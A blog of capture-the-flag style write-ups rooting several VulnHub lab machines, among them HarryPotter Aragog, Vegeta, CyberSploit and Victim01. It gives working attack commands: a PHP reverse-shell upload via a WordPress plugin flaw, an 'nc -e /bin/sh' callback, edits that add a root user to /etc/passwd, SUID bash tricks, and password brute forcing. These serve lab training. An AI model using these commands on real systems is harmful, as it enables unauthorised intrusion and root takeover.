Category: vulnhub

How I took down a machine called “HarryPotter: Aragog”

Overview:

Target Machine IP Address: 192.168.56.121  
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Medium

Although author mentioned it was easy but it took me close to 5 hours to take this down.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

We came to know our target or victim machine IP: 192.168.56.121

nmap -sC -sV -p- -Pn 192.168.56.121 -o nmap.log

Output: (Information redacted)

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)

Browsing website:

Searching Directory in Webserver

gobuster dir -u 192.168.56.121 -o gobuster.log

Output:

When we visit http://192.168.56.121/blog

We understood that it is running a wordpress website. Therefore, I ran wpscan to get more information about the website.

wpscan --stealthy --url http://192.168.56.121/blog/ --plugins-version-detection aggressive --plugins-detection aggressive  -o wpscan-version.log

We came to know that the website is running an old plugin called ‘wp-file-manager’.

Vulnerable plugin: wp-file-manager
Version: 6.0

By googling regarding exploit for the plugin

Detail can be viewed from here.

On Kali Linux Machine:

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

cp cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php payload.php   (the reason why I rename this file is because I am trying to follow the PoC mentioned in this link)

We have to mention the Target IP address and Port Number in payload.php; in that case, it is 192.168.56.1 and 1234 (port number)

curl -k -F cmd=upload -F target=l1_ -F debug=1 -F 'upload[]=@payload.php' -X POST http://192.168.56.121/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

Open a new Terminal Kali Linux Machine:

nc -lvp 1234

On Kali Linux Machine (continue with the above curl command):

curl -kiLsS http://192.168.56.121/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php

Do you see that on that new Terminal Window, you received a reverse connection.

$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@Aragog:/$ export TERM=xterm
export TERM=xterm

User Flag: (There were two users and I know you will figure it out that under which user it has the userflag)

horcrux1.txt
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

─$ echo "MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==" | base64 -d 
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

Since we know that the website was a WordPress based site, so I went to check for wp-config file and I was not able to find it under the usual location.

My knowledge on server setup came into handy.

The website directory or the website is located here /usr/share/wordpress

However, I know that this wp-config.php is not the real file. I am little impressed with the machine designer because one of my role in the current organization where I work is to setup WordPress environment and I tried my best to structure it in a way that hacker will face tough time to get it. Likewise, if I know how the machine designer place it’s wp-config.php, I will implement it in my upcoming project work. Anyway, let’s find where it is located.

ls -lah

cd /etc/wordpress
ls -lah 
cat config-default.php

DB_NAME: wordpress
DB_USER: root
DB_PASSWORD: mySecr3tPass

On Kali Linux Machine:

echo "$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc." > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john --show

Do you recall that during the scanning phases (initial), we came to know that the machine is running with ssh service. Let’s try to login it with using the following credentials…

username: hagrid98
password: password123
Machine: 192.168.56.121

ssh hagrid98@192.168.56.121    #we got login

I was playing around and couldn’t find anything useful. It is my ritual that at this time if I don’t get anything useful, I run linpeas.sh on the victim machine (I hope you have already picked-up how to do this by now, I mean using SimpleHTTPServer 🙂 ).

I came to know that the machine has a weird file

-rwxr-xr-x 1 hagrid98 hagrid98 81 Apr 1 20:03 /opt/.backup.sh

cat /opt/.backup.sh

#!/bin/bash
cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads

When I check the permission of the folder at /tmp/tmp_wp_uploads; do you see what I see? (It has root for user and group)

Although user hagrid98 has no crontab entry but it looks like root user has. Therefore, let us add the following line as the entry to the above file .backup.sh.

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

Note: set user or group ID on execution (s) chmod +s is used.

I waited around 5 minutes and finally I got what I wanted, the binary with execute permission enabled.

hagrid98@Aragog:/tmp$ ls -lah
total 2.3M
drwxrwxrwt 10 root root 4.0K May 28 17:28 .
drwxr-xr-x 18 root root 4.0K Mar 31 17:52 ..
-rwsr-sr-x 1 root root 1.2M May 28 17:32 bash
-rwxr-xr-x 1 root root 1.2M May 28 17:24 bash1
drwxrwxrwt 2 root root 4.0K May 28 12:42 .font-unix
drwxrwxrwt 2 root root 4.0K May 28 12:42 .ICE-unix
drwx------ 3 root root 4.0K May 28 12:42 systemd-private-b275630ffd804e5187080888580cb0b0-apache2.service-JVTT6g
drwx------ 3 root root 4.0K May 28 12:42 systemd-private-b275630ffd804e5187080888580cb0b0-systemd-timesyncd.service-AHdvzF
drwxrwxrwt 2 root root 4.0K May 28 12:42 .Test-unix
drwxr-xr-x 5 root root 4.0K May 28 12:46 tmp_wp_uploads
drwxrwxrwt 2 root root 4.0K May 28 12:42 .X11-unix
drwxrwxrwt 2 root root 4.0K May 28 12:42 .XIM-unix
hagrid98@Aragog:/tmp$

hagrid98@Aragog:/tmp$ ./bash -p       #visit this link if you don't know why i used this line of command

hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}
In muggle terms: 2: maRvoLo GaUnt's riNg deStrOyed bY DUmbledOre

May 28, 2021

How I took down Alpha1 Machine
Overview:
```
Target Machine IP Address: 192.168.56.118  
My Machine IP Address: 192.168.56.1
```
Mission:

Boot to Root
1. To get user flag
2. To get root flag
3. To get root access

Level: Easy/Medium
```
If you know how to do ssh tunneling and know what is 'BrainFuck'. I think you are good to go.
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
IP: 192.168.56.118  (which spits out by machine and we do not need to search for it)
```
*************************************

Since I know the machine IP address, I went ahead to do some manual assessment while running the following command (which helps to collects pretty much everything I required to know about this machine)

Browse 192.168.56.118/robots.txt

All those list of sub-directories were bogus but at the bottom, I noticed a strange character..
```
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>+++++++++++++++++.>>---.+++++++++++.------.-----.<<--.>>++++++++++++++++++.++.-----..-.+++.++.
```
Initially I thought it was some kind of encrypted code but later I came to under it is another programming language called ‘BrainFuck’.

I used this link to convert the string.

Value we got:/alfa-support

*************************************

Browse: 192.168.56.118/alfa-support

Password Pattern: pet followed by 3 numerical digits.

<—————————– Let’s keep all the above steps within stage 1. —————————–>

<————————————————– Stage 2 Begins —————————–———————>
```
autorecon 192.168.56.118
```
```
cat _full_tcp_nmap.txt | less
```
```
ftp 192.168.56.118 
username: anonymous
password: anonymous 
ls
cd thomas
get milo.jpg
```
```
exiftool milo.jpg (didn't find anything useful)
```
From stage 1, we can conclude that the pet’s name is milo.

Password pattern is milo$i$j$k ($i$j$k represents three digits)

Let’s write a script to prepare a list of password.

vim script.sh
```
#!/usr/bin/bash
for i in {0..9}; do
    for j in {0..9}; do 
        for k in {0..9}; do 
            echo "milo$i$j$k" >> password.txt
        done
    done
done
```
```
chmod +x script.sh./script.sh
```
I tried a python script for the task 🙂
```
#!/usr/bin/python3
import sys
with open('password.txt', 'w') as f:
sys.stdout = f 
for i in range(1, 10): 
    for j in range(1, 10):
        for k in range(1,10):
            print("milo"+str(i)+str(j)+str(k))
```
Brute Force SSH using Hydra
```
hydra -l thomas -P password.txt -s 65111 ssh://192.168.56.118
```
username: thomas
password: milo666
```
cat _full_tcp_nmap.txt | less
```
```
ssh thomas@192.168.56.118 -p 65111
```
user_flag==>> M4Mh5FX8EGGGSV6CseRuyyskG (Solution 1)

scp -P 65111 thomas@192.168.56.118:/home/thomas/.remote_secret . #Saved Remote File (Keep in mind)

I tried to perform file, strings, cat, binwalk etc.. no use lol

I tried to evaluate the target machine with the help of linpea.sh program

Miscellaneous Steps :
```
On Kali Machine:  
cd /path-to-linpea.sh/
python3 -m http.server 

On Target or Victim Machine: 
cd /tmp
wget 192.168.56.118/linpea.sh 
chmod +x linpea.sh 
sh linpea.sh
```
Click on Image to View in HD

Port 5901

We have password from the above information. Do you remember this file .remote_secret ?
```
vncviewer -passwd .remote_secret 192.168.56.118:5901
```
I think I need to port forward or bind (like ssh tunneling). Let’s do some googling
```
ssh -p 65111 -L 5901:localhost:5901 thomas@192.168.56.118
```
```
vncviewer -passwd .remote_secret localhost:5901
```
Viola!! We got the root flag as well as root access 🙂
May 17, 2021

My approach to Vegeta Machine

Overview:

Target Machine IP Address: 192.168.56.46  
My Machine IP Address: 192.168.56.20

Mission:

Boot to Root

THIS IS A MACHINE FOR COMPLETE BEGINNER , GET THE FLAG AND SHARE IN THE TELEGRAM GROUP (GROUP LINK WILL BE IN FLAG.TXT)

DHCP : ENABLED
IP : AUTO ASSIGN

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.46 -o nmap.log

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))

I checked source code, exiftool on image but didn’t get a good result, so I will not write those processes here (afraid it may bog you down with rabbit holes.) However, something interesting is showing at robots.txt

Note: Don’t just stop there, I missed it once.. look at the line number, something must be at the bottom

aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9BZ0RNSUFyQUJRUUEySUFqQUJnUUIySUFnQUJzUUJHQURnZ0JzUUJDQURRZ0NzQUZCQURhRUJmbjUrUmwvbk9aTFAxeER6K3g5VTA1cWJoWjFkcjRzSFQyejkwMDVxYmxaMU5uNXNuVDB6TjQzNWFUbVpsRm41OHZTMFRONzM1U1RtcHRGblowdlMwZlA3SDFUVG1wdUZuVjJ2aXdkUGJQM1RUbXB1Vm5VMmZteWRQVE0zamZscE9hdVhKUVRUamxkSHZ0YmxvNDZOUWp5UjV4eUlvZ09CUGtqVGprUlJBZUMvQkdubkFpaUEwSCtpRk5PQk5HQklIL0VLU2VDNkVDUVArS1VFMEYwakJWRS9aSGM4SEhkUHZ1RWQwZVF3N003MWFtelRIaDNCRGs4dTFPZE9zdUVkMGVRdzdNNzFhbXpUSGgzQkRrOHUxT2RPc3VFZDBlUXc3TTcxYW16VEhoM0JEazh1MU9kT3N1RWQwZVFJcWJNNENUcmhKMGhTQkZUWmtDUUdBaFN4SlFaRUNRR2doUXhaUVlFaVlFZ1JVeVpBVUZpSUVnUlUyWkFrQmdJVXNTVUdSQWtCb0lVMFRHZjAxN2UrdTRJVXNScEtSRGtXYzVsdjNEQlN4ZjFqZE5TSU1pem5NdCs0WUtYTHVvYnA2VkFrR2M1bC8zQ0JTOWQxRGRPUzRFZ3ozSXUrNFVMWHJxb2I1eVdBa0dlNVZ6MkN4ZThkRkhmT0MwRmdqekx1ZXdYTGhCL2VGazZjcm84Mm9rc2IzMTNCQkgwdkNITFc5OGRRUVE5YjhqeTFuZEhFRUhQRzdLODlkMFJSTkR6aGl4dmZYY0VFZlM4SWN0YjN4MUJCRDF2eVBMV2R5OFZaTXJwV1BDYjY2YWNEQWdTbUkrNjJTY0RnZ1RtbzI3MnlZQWdnZm1vbTMweUlFaGdQdXBtbnd3SUVwaVB1dGtuQTRJRTVxTnU5c25nOVNPMkFjcmxQN212SXd2OEg3YjVDd1NCVDlqbUx4QUVQbUdidjBBUStJUnQvZ0pCNEJPMitRc0VnVS9ZNWk4UUJENlIvUS9pMURPTFU4OHBkV3FxY3lKSTBlenFubFBxMUNBSWdveXFVNE1nQ0RLcVRnMkNJTWlvT2pVSWdpQ2o2dFFnQ0lLTXFsTnpYQkExYnhZeWk5TU1UbStVeWwvZXNSZ0VpZU0wZzlNYnBmS1hkeXdHUWVJNHplRDBScW44NVIyTFFaQTRUak00dlZFcWYzbkhZaEFranRNTVRtK1V5bC9lc1JnRWllTTBnOU1icGZLWGR5d0dRZUk0emVEMFJxbjhwYzJTUTcxWkFxZlpwd2pTVWJmc2w2cEtoRU1RajV3SUVzeWZxa3FFUXhDUG5BZ1N6SitxU29SREVJK2NDQkxNbjZwS2hFTVFqNXdJRXN5ZnFrcUVReENQbkFnU3pKK3FTb1JERUkrY0NCTE1uNm9xRHVleWpLNmVhcHdFNmNpWjdabkttS29xRHVleWpLNmVhaEFFUVI3VnFYdXFRUkFFZVZTbjdxa0dRUkRrVVoyNnB4b0VRWkJIZGVxZWFoQUVRUjdWcVh1cVFaQ0JncWcvNWpmZjEvRngzUzdXOHE2cHdia1BRUkNFK3hDa01HZnFycW5CdVE5QkVJVDdFS1F3WitxdXFjRzVEMEVRaFBzUXBEQm42cTdLY0ZtY0hzYnBvM1RLMlpGbEFnaHlPQXVDZUlNZ2g3TWdpRGNJY2pnTGduaURJSWV6SUlnM0NISTRDNEo0Z3lDSHN5Q0lONldDM1A0d1RvL3RKTEo2TDhvc0NGSjBueG9FUVpDMkxCMzNxVUVRQkduTDBuR2ZHZ1JCa0xZc0hmZXBRUkFFYWN2U2NaOGFCRUdRdGl3ZDk2bEJrSUdDZE5TcGUyYnZVMzk0Nm5mb3lPazAzN0pmdU1Ba2VGZlA3SDFPSDE3MlBuVk9wL21XL2NJRkpzRzdlbWJ2Yy9yd3N2ZXBjenJOdCt3WExqQUozdFV6ZTUvVGg1ZTlUNTNUYWI1bHYzQ0JTZkN1bnRuN25ENjg3SDNxbkU3ekxmdUZDMHlDZC9YTTN1ZjA0V1h2VStkMG1tL1pMMXhnRXJ5clovWStwdzh2ZTU4NnA5Tjh5MzdoQXZHSGZzUHlPN0pNMmFkNlp3aGkrbWdkODkyd1R3UzU3RUU3WmtjUUJMbm1RVHRtUnhBRXVlWkJPMlpIRUFTNTVrRTdaa2NRQkxubVFUdG1SNUFYQ1hJNzZnKzJBN1dRSFZrNnhFcmxUMVZkRElKNFpFRVFVeERFSXd1Q21JSWdIbGtReEJRRThjaUNJS1lnaUVjV0JERUZRVHl5akJXa1kyRDFjV0xLQitUeXdYNERRUkFFUVlUM0ljaGhFS1FXQkVFUUJCSGVoeUNIUVpCYUVBUkJFRVI0SDRJY0JrRnFzUmJFaVk2Y04zek1UaCtzK28xUy9VNEg2QUpCRUFSQk5pQUlnaURJQmdSQkVBVFpnQ0FJZ2lBYkVBUkJFR1FEZ2lESUtFRnUrTGc2NW5QSzRuVFV1MTdlRlM0d2VqUjF6bzc1bkxJNEhmV3VsM2VGQzR3ZVRaMnpZejZuTEU1SHZldmxYZUVDbzBkVDUreVl6eW1MMDFIdmVubFh1TURvMGRRNU8rWnp5dUowMUx0ZTNoVXVNSG8wZGM2TytaeXlPQjMxcnBkM2hRdU1IazJkczJNK3B5eE9SNzNyNVYzaEFxTkhVK2QwMnN1VUxOTnpJb2h4M1ExWnB1ZEVFT082RzdKTXo0a2d4blUzWkptZUUwR002MjdJTWowbmdoalgzWkJsZWs0RU1hNjdJY3YwbkFoU3hKUVoxRDJuZkMvTEhKWExjQm9ZUVR4NlR2bGVsamtxbCtFME1JSjQ5Snp5dlN4elZDN0RhV0FFOGVnNTVYdFo1cWhjaHRQQUNPTFJjOHIzc3N4UnVReW5nUkhFbytlVTcyV1pvM0laVGdNamlFZlBLZC9MTWtmbE1weVk4bEVxSC9zSlRoODZnaFNBSUxVZ1NQT2kxQ0JJTFFqU3ZDZzFDRklMZ2pRdlNnMkMxSUlnell0U2d5QzFJRWp6b3RRZ1NDMElVckNvS1NjN245TmVzcHplZmNVTTJmbFMvU29EVERrZEMzYWF3U2tuZ2d3OEhRdDJtc0VwSjRJTVBCMExkcHJCS1NlQ0REd2RDM2Fhd1NrbmdndzhIUXQybXNFcEo0SU1QQjBMZHByQktlZnJCQUY0RXdnQ3NBRkJBRFlnQ01BR0JBSFlnQ0FBR3hBRVlBT0NBR3hBRUlBTkNBS3dBVUVBTmlBSXdBWUVBZGp3SHlVRnd2VnIwS3ZGQUFBQUFFbEZUa1N1UW1DQw==

Yes, this is base64. We need to decode it.

If you wonder why I did double decoding, you might understand it by doing it with single decoding. Because output of the base64 decoded message is another base64 decoded text, therefore, I did it twice.

The decoded file is actually a PNG file, do you see the PNG in the top of the screenshot?

I have redirected the output and named the file decoded.png

It is a QR Code. Now I need to do a little shopping. Find an online tool that could read the code and spit out the message if it has any… By the way, I tried my mobile QR reader and I already got the message, however, let’s do the usual way…

I am going to use this tool to decode the message: https://zxing.org/w/decode.jspx

Password:: topshellv

However, I did Scan with Nikto and Gobuster, both gave me some information, nevertheless, so far it appears to be another rabbit hole to me though 🙂

As you can see very well that directory redirects to somewhere (which are not known yet, I am planning to run a burp suite to look into it.)

In Nikto result, there is a link which intrigued me, nevertheless, I am not sure whether it is again a rabbit hole, however, let’s keep it in our note.

I must confess here that I was not able to get anything that could be of use. So, I had to peek other people’s writeup. The author of the writeup used another custom wordlist which is not there in the list of directory database which we use normally. Therefore, I think we really need to keep this in my that if a scanner can find nothing that doesn’t mean nothing is there.

Actually, I can add the bulma word in the dictionary and act as if I find the directory using the scanner but I don’t think that is the way.

Anyway, let’s proceed with the directory http://192.168.56.46/bulma/

I am impressed with this audio file because it contents Mores Code. (I don’t know how to read the Mores Code manually, however, we can find a tool for that)

Tools to decode mores audio file: Click Here.

We got username: trunks 
password: u$3r

If you run this command, you will get to know which (system) files you could write (or modify).

find / -writable -type d 2>/dev/null

There were so many, files that I could edit. I did a quick brush. However, the last file atracks me the most.

/etc/passwd

Let’s modify this file using the findings…

echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd 
which means we added a user name Tom and the password is Password@973 

su Tom 
cat root.txt

That’s it, guys… if you don’t like to enumerate manually you can use linpeas.sh tool to enumerate the box for you…

Additional Note:

I upload linpeas.sh to our target machine from my Kali Machine using SimpleHTTPServer (by the way, in order to save some time, I aliased the command with up).

July 27, 2020

rooting cybersploit 2 machine ?
Overview:
```
Target Machine IP Address: 192.168.56.41
My Machine IP Address: 192.168.56.20
```
Mission:

Boot to Root
```
Your target is gain the Root access

There is no any flag in this VMs

Share root access with me twitter@cybersploit1

This works better with VirtualBox rather than VMware
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth0 192.168.56.1/24
```
```
nmap -sC -sV -p- 192.168.56.41 -o nmap.log
```
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))
```
Let’s browse 192.168.56.41

Some strings are encrypted. Let’s check out the source code. (ctrl+u shortcut key)

Yes, this is a ROT47 encrypted message, I thought to write a script to do this however, let’s not waste time. Better google an online tool for this task. I used this one.
```
username: D92:=6?5C2 -> shailendra
password: 4J36CDA=@:E-> cybersploit1
```
Since the target machine is running SSH service, let’s try that.
```
ssh shailendra@192.168.56.41
```
ls -lah

We got a hint.txt

The system is running docker.

Remember always, this will be our black book of magic (gtfobins.github.io/)
```
docker run -v /:/mnt --rm -it alpine chroot /mnt sh 
```
However, in order to run this command, you need to provide the internet (at least in my case), else you might not able to download alpine/latest.

Finally, cybersploit2 is pwned!!
July 23, 2020
Shelling Decoy
Overview:
```
Target Machine IP Address: 192.168.56.42
My Machine IP Address: 192.168.56.20
```
Mission:
```
THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth0 192.168.56.1/24
```
```
nmap -sC -sV -p- 192.168.56.42 -o nmap.log
```
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

80/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
```
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdfThe zip file required a password to access it. I am not able to find anything which could be leveraged to use as password. Let’s crack it through brute force using rockyou.txt with fcrackzip tool.
```
 fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip 
```
```
password: manuelhttps://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
```
We were able to get some juicy information and I am not going to write here each file, however, I am sure you know well that shadow file is the hashed form of the password for the users. I think this may be enough.

We need to break the hash, so let’s use john for the task and take necessary hashes and make it in one form.

username: 296640a3b825115a47b68fc44501c828
```
echo "$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us." | > ../hash.txt
```
```
ssh 296640a3b825115a47b68fc44501c828@192.168.56.42
```
password: server

We need to bypass the rbash restriction. I have never used it however, I have seen this in blog and youtube vidoes by IPPSec.

If you want to know more about rbash bypass, you can read it from here.

From that pdf resources, I tried all the commands and it didn’t work. However, as I tried the following Advance Techniques part, it no longer gives me
```
ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"
```
Now we can see that it no longer showing us rbash restriction rather command not found which means, the binary or the command path needs to be fixed here.

What I tried was I echo the PATH of my Kali Machine and copied this path and set it to the target machine. Perhaps you might understand it better if you see this screenshot.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin

Ok, let’s download pspy on Kali Machine and they transfer that to out targetted machine. I use SimpleHTTPServer to do the work, of course, you can have your own method 🙂

Let’s do a searchexploit chkrootkit or search chkrootkit on google (it will show exploit-db which is GUI of searchsploit).

When we read the exploit steps (like how to configure and how to use it), it tells us this..

The steps are quite self-explanatory, however, what I did here is, I checked the location of the NC program in the target box and then let it run /bin/sh with port 1234, to reverse a connection to IP address 192.168.56.33 (My Kali Machine). Of course, as per the instruction we need to give execution permission to out executable file

Note: I checked the cron entry and I was not able to find any relevant information that whether update (which we have created) is running nor I found chkrootkit related. Interestingly when I check the process through pspy64, periodically /tmp/update is running. Therefore, we can leverage that to our purpose. By the way, this might be because when we run this program honeypot.decoy, it triggers the chkrootkit.

Exploit 1:
```
#!/bin/bash
echo 'root:tcert.net' | sudo chpasswd

save it as update (by the way, you have to use nano editor this time because if I am not wrong vi editor is not available)

chmod +s update  (I sipped tea and look around) and then 

su - root 

password: tcert.net 
```
Exploit 2: (It didn’t work for me. I need to dig little deeper)
```
echo "/usr/bin/nc -e /bin/sh 192.168.56.33:1234" > update
chmod +x update
```
That’s all guys 🙂
July 23, 2020

Let’s pwn cybersploit machine

Overview:

Target Machine IP Address: 192.168.56.40
My Machine IP Address: 192.168.56.20

Mission:

THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0 192.168.56.1/24

nmap -sC -sV -p- 192.168.56.40 -o nmap.log

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

username:itsskv

cybersploit

CyBeRSplOiT

I ran nikto but didn’t get information but gobuster did give me something..

gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

http://192.168.56.40/robots.txt

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

Let’s decrypt the string…

echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d

Flag1: cybersploit{youtube.com/c/cybersploit}

By the way, you might be wondering what is at http://192.168.56.40/hacker (it was just a gif).

Ok since, we got the username: itsskv

And password: cybersploit{youtube.com/c/cybersploit}

And the box is running ssh, how about we try that first?

ssh itsskv@192.168.56.40

ls -lah

cat flag2.txt

I used this website to decrypt. https://cryptii.com/pipes/binary-to-english

good work !
flag2: cybersploit{https:t.me/cybersploit1}

uname -a

3.13.0-32-generic

Google 3.13.0-32-generic exploit searchsploit didn’t work for me (I will figure this out later)

https://www.exploit-db.com/exploits/37292

 gcc 37292.c -o exploit

./exploit

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

That’s it guys! Going to have breakfast now … little hungry lol

Wish you a productive day!!

July 22, 2020

Let’s take down victim01
Overview:
```
Pwned Machine IP Address: 192.168.56.38
My Machine IP Address: 192.168.56.20
```
Mission:
```
To gain access to root and read the flag file Flag.txt.
```
Download:
```
You can download the machine from here.
```
************************************

Information Gathering & Scanning Process:
```
sudo arp-scan --interface=eth0 192.168.56.1/24
```
```
nmap -sC -sV -p- -o nmap.log 192.168.56.38
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

8080/tcp open http BusyBox httpd 1.13

8999/tcp open http WebFS httpd 1.21

9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1)
```
http://192.168.56.38:8999
```
Let’s download WPA-01.cap

Let’s run the packet in wireshark
```
wireshark WPA-01.cap &
```
I tried my best to dive into the cap file, I was not able to get any anything concrete. Based on our previous machine that we did, I am having a hunch that we will get a username and a password out of this.

Although it shows many connected devices to the router (dlink), only dlink did work as a username. You might be wondering how I got the password? You might know if you have read this post.

Yeah I did run aircrack-ng on the CAP file with rockyou file.
```
aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt
```
Yes, the password is p4ssword
```
ssh dlink@192.168.56.38        password: p4ssword
```
I made it a habit that as soon as I get a limited (or user shell), I do manually check all the low hanging fruits.

Such as

sudo -l

cat ~/.viminfo

crontab -l

history

find / -perm -u=s -type f 2>/dev/null

find / -perm 0777 -type f 2>/dev/null

find / -writable -type d 2>/dev/null

to name a few. If I don’t find anything then I use linpeas.sh and other scripts, by uploading those to /tmp folder of that limited user account.

We found something interesting.
```
https://gtfobins.github.io/gtfobins/nohup/
```
Note: kindly bookmark this website site. https://gtfobins.github.io/
```
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
```
yeah, we got the flag..

Method 2:

To check writeable directory
```
find / -writable -type d 2>/dev/null 
```
```
/var/www/bolt/public/files  it has the 777 permissions
```
If you have carefully read the output from nmap, you might have seen that the server is running PHP cli server. That means we can upload a php reverse shell.

Let’s do that..

On Kali Machine

I have downloaded and stored my shells and other tools at /opt

python -m SimpleHTTPServer 8000

On Victim01 Machine

cd /var/www/bolt/public/files/

wget 192.168.56.33:8000/php-reverse-shell.php

chmod +x php-reverse-shell.php

And also change the IP address and Port of your choice. Mine IP: 192.168.56.33 Port:1234

Let’s set up an nc setup on Kali Machine to receive a reverse connection from the Victim01 machine.

I tried to execute the PHP shell on the victim machine to get the reverse connection and I get a limited shell. However, when I try to view the PHP shell through the browser, I got a shell with root privilege. To be honest, I don’t know what is the primary reason behind it and I think I will need to explore more on this. However, I am gonna keep this in mind while I do shelling other boxes in the future.

yes, another way to get root!

That’s all guys 🙂
July 21, 2020
Writeup for Troll3 machine
Overview:
```
Pumpkin Raising Machine IP Address: 192.168.56.26
My Machine IP Address: 192.168.56.1
```
Mission:
```
To gain access to root and read the flag file Flag.txt.
```
To know the IP address of the Target Machine:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Scanning the Network

nmap -sC -sV -p- 192.168.56.26 -o nmap.log
- sC default nmap script
- sV reveal what services are running on the target machine with respective version numbers
  -p- it means scan all the ports (65535)
  -o ouput save to nmap.log
When I look at the vm, I can see that there is start:here. I tried ssh with start as username and here as the password

Since the user “start” not a sudo user therefore, I was not able to know what sudo command it could run.

However, there were two folders.
- bluepill
  - awesome_work
- redpill
  - this_will_surely_work
Both awesome_work and this_will_surely_work are ASCII text file.

bluepill has a shorten link, I am afraid it might automatically do some drive-by attack at hind, so let’s do a virustotal scan.

Virustotal report didn’t show any threat. (nevertheless, some good cryptor could bypass such scan and let’s not discuss it here)

Now, let’s unshorten the link. There are many free services available online and you can choose based on your preference.

Ok, it’s just a rabbit hole.

cat redpill/this_will_surely_work

Another rabbit hole : (

Let’s enumerate the target machine, whether it has only binary or file which has enabled SUID or SGID.

find / -perm 0777 -type f 2>/dev/null

Since, I am using uBuntu Desktop, I need to install openssh-server package to receive binaries from the target machine.
```
sudo apt install openssh-server -y

sudo systemctl start ssh

scp /var/log/.dist-manage/wytshadow.cap researcher@192.168.56.1:/home/researcher/vulhub/Troll3/2
```
Narration: I am trying to transfer wytshadow.pcap file from the victim machine to my local machine at /home/researcher/vulhub/Troll3/2

Transfer the gold_star.txt (looks like it is list of password dictionary)

